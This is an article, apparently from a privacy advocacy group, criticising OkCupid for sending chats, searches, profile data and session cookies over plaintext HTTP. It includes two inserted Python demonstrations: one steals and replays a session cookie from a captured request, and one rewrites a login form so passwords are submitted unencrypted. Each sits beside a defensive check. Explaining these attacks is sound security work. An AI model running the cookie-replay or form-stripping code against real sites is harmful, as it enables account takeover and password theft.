The love fest may be coming to an end for the hundreds of thousands of users searching for that special someone through one of the largest free online dating sites. OkCupid is putting users' privacy at risk by failing to support secure use of its entire site through HTTPS. Every OkCupid email, chat session, search, clicked link, web page viewed, and username is sent over the internet as unencrypted plaintext, where it can be intercepted and read by anyone on the same network.
Screenshot from the OkCupid Help Forum. While passwords after initial signup aren't sent in the clear, there are other serious security problems with OkCupid.com.
"HTTPS" is the standard web encryption that ensures information sent and received over the internet is encrypted rather than transmitted as plaintext. OkCupid does not enable HTTPS across its site, which means that while OkCupid does not leak passwords entered during login over plaintext, it does leak plenty of other sensitive information. OkCupid's failure to offer HTTPS support potentially reveals:
- Email content from within OkCupid
- Content of online chats on OkCupid
- Searches conducted on the site
- Every individual page viewed, and thus every profile looked at
- Content of "private" questions, that is, questions a user answers in order to improve match results but then marks as "private" so that others cannot see his or her answer
Failing to provide HTTPS is particularly unfortunate because OkCupid offers a variety of privacy-enhancing ways to restrict who can access your profile. For example, users who mark their sexual orientation as gay or bisexual can choose not to let their profile be seen by straight people. This feature could be useful for someone who wants to date a same-sex partner but is not openly queer to others in their community. Unfortunately, your profile data, including the fact that you identify as gay and don't wish to be seen by straight people, is transmitted over plaintext.
OkCupid provides privacy settings to restrict who sees your profile, including limiting whether heterosexual users can see your profile.
Other privacy-enhancing features, such as restricting who can see your profile (everyone, OkCupid members, your favorites, or nobody at all), are easily circumvented by someone monitoring your plaintext communications with OkCupid.
It's even worse than you imagined.
The failure to encrypt your communications exposes sensitive data in online profiles to eavesdroppers, who could snoop on the content of your profile to learn about sensitive topics like religious and political beliefs, drug use, and sexual practices. The failure to encrypt also reveals the HTTP cookie that is used to authenticate you to the site, which means an eavesdropper can actually take over your account and impersonate you, even without knowing your password.
OkCupid lets users answer questions to help improve their matches. Users are given privacy settings to answer questions "privately", though the data is still sent in plaintext.
Although security experts have warned about this problem for more than a decade, the attack was often dismissed as theoretical or difficult to demonstrate. But all that changed with the release of Firesheep, a simple tool that can be used on shared wifi networks to take over web-based accounts on non-HTTPS websites. This kind of eavesdropping is trivial for someone with even basic skills.
Firesheep lets an attacker take over an account by stealing a cookie, without ever knowing the account password. For example, when you sit down in a cafe using a shared network and log into a site that does not have HTTPS enabled, someone using the same network can watch what you do and even impersonate you.
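To make the cookie theft concrete, here is an added example (it is not from the original article, and not OkCupid's or Firesheep's code) that does by hand what Firesheep automates: it parses a constructed plaintext HTTP request as it would appear on a shared network, lifts the session cookie out of it, and builds a replay request that presents that cookie without any password. The request bytes, hostname and cookie name are all made up for illustration. The last function is the check a site operator would want: a cookie set without the `Secure` attribute will be attached to plain http:// requests and is therefore exactly what an eavesdropper harvests.

```python
"""Plaintext-HTTP session hijack: what an eavesdropper on shared wifi sees."""

# Constructed sample: one plaintext HTTP request as it would appear on the
# wire when a logged-in user loads a profile page over HTTP. The hostname,
# path and cookie values are made up for this example.
CAPTURED_REQUEST = (
    b"GET /profile/example_user HTTP/1.1\r\n"
    b"Host: www.example-dating-site.test\r\n"
    b"Cookie: session=9f2c1a7e4b0d; prefs=dark\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

SESSION_COOKIE_NAME = "session"  # assumed name of the authentication cookie


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path and a header dict
    (header names lower-cased, duplicates not handled: enough for a demo)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def extract_cookies(cookie_header: str) -> dict:
    """Parse a Cookie request header ("a=1; b=2") into a name -> value dict."""
    cookies = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def steal_session(raw_request: bytes, cookie_name: str = SESSION_COOKIE_NAME):
    """Return the session token visible in a plaintext request, or None."""
    req = parse_request(raw_request)
    cookies = extract_cookies(req["headers"].get("cookie", ""))
    return cookies.get(cookie_name)


def forge_request(raw_request: bytes, path: str) -> bytes:
    """Build a fresh request for `path` that presents the stolen cookie.
    This is the Firesheep-style replay: the server sees a valid session
    cookie and serves the victim's account; no password is involved."""
    req = parse_request(raw_request)
    token = steal_session(raw_request)
    if token is None:
        raise ValueError("no session cookie in capture")
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {req['headers']['host']}\r\n"
        f"Cookie: {SESSION_COOKIE_NAME}={token}\r\n"
        "\r\n"
    ).encode()


def cookie_is_sniffable(set_cookie_header: str) -> bool:
    """Defensive check on a Set-Cookie response header: without the `Secure`
    attribute the browser will attach the cookie to http:// requests too,
    so it can be captured exactly as above even if login itself used HTTPS."""
    attrs = [a.strip().lower() for a in set_cookie_header.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    print("stolen token:", steal_session(CAPTURED_REQUEST))
    print(forge_request(CAPTURED_REQUEST, "/messages").decode())
    print("sniffable:", cookie_is_sniffable("session=abc; Path=/; HttpOnly"))
```

The replay in `forge_request` works because the server has no way to tell the attacker's copy of the cookie from the victim's; the only fix on the site's side is to never let the cookie travel over plaintext, which means HTTPS everywhere plus the `Secure` attribute that `cookie_is_sniffable` checks for.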
Because OkCupid's login form is itself delivered over insecure HTTP, a more sophisticated attacker can also tamper with the login form, replacing it with a version that disables HTTPS entirely in order to learn the user's password.
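The form-tampering attack above, as an added illustration that is not taken from the original article and not OkCupid's code: a man-in-the-middle who is already relaying the login page over plaintext HTTP can rewrite the form's action from https:// to http:// so that the browser posts the password in the clear (the technique that sslstrip-style tools automate). The sample page and hostname are constructed for the example. The `login_is_safe` check captures the article's point: an HTTPS form action proves nothing when the page carrying the form was fetched over HTTP, because the attacker controlled that page.

```python
"""Login-form tampering: rewriting a form on a page served over plaintext HTTP."""
import re
from html.parser import HTMLParser

# Constructed sample: a login page delivered over plaintext HTTP whose form
# posts to an HTTPS endpoint. Hostname and markup are made up for this example.
ORIGINAL_PAGE = """<html><body>
<form id="login" method="post" action="https://www.example-dating-site.test/login">
  <input name="username"><input name="password" type="password">
</form></body></html>"""


def strip_https_from_forms(html: str) -> str:
    """What a man-in-the-middle can do to a page it is already relaying in
    plaintext: change every <form action="https://..."> to http:// so the
    browser submits the credentials unencrypted, where the attacker reads them.
    The user sees the same page; only the submit target changed."""
    return re.sub(r'(<form\b[^>]*\baction=")https://', r'\1http://',
                  html, flags=re.IGNORECASE)


class FormActionCollector(HTMLParser):
    """Collect the action URL of every <form> so a page can be audited."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action", ""))


def form_actions(html: str) -> list:
    parser = FormActionCollector()
    parser.feed(html)
    return parser.actions


def forms_submitting_in_clear(html: str) -> list:
    """Which forms on the page would send their fields over plaintext HTTP?"""
    return [a for a in form_actions(html) if a.lower().startswith("http://")]


def login_is_safe(page_url: str, html: str) -> bool:
    """A login is only safe if the page carrying the form arrived over HTTPS
    (so nobody could have rewritten it) AND every form posts over HTTPS.
    An https:// action on an http:// page is worthless: the attacker who
    relays that page can change the action at will, as shown above."""
    if not page_url.lower().startswith("https://"):
        return False
    return all(a.lower().startswith("https://") for a in form_actions(html))


if __name__ == "__main__":
    tampered = strip_https_from_forms(ORIGINAL_PAGE)
    print("original actions:", form_actions(ORIGINAL_PAGE))
    print("tampered actions:", form_actions(tampered))
    print("safe over http :", login_is_safe("http://www.example-dating-site.test/", ORIGINAL_PAGE))
    print("safe over https:", login_is_safe("https://www.example-dating-site.test/", ORIGINAL_PAGE))
```

Note that no amount of checking on the client side rescues a form that arrived over HTTP; the only fix is on the site, by serving the login page, and everything else, over HTTPS.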
Major websites like Twitter have come to appreciate these threats and offer meaningful, comprehensive HTTPS support to protect their users. These actions are in line with former Federal Trade Commissioner Pamela Jones Harbour's call for websites to adopt HTTPS. Unfortunately, online dating sites like OkCupid are lagging behind. Way behind.
Tell OkCupid to protect your privacy
Many avid fans of OkCupid want to let the service know that it shouldn't cut corners when it comes to security. Send OkCupid a message here.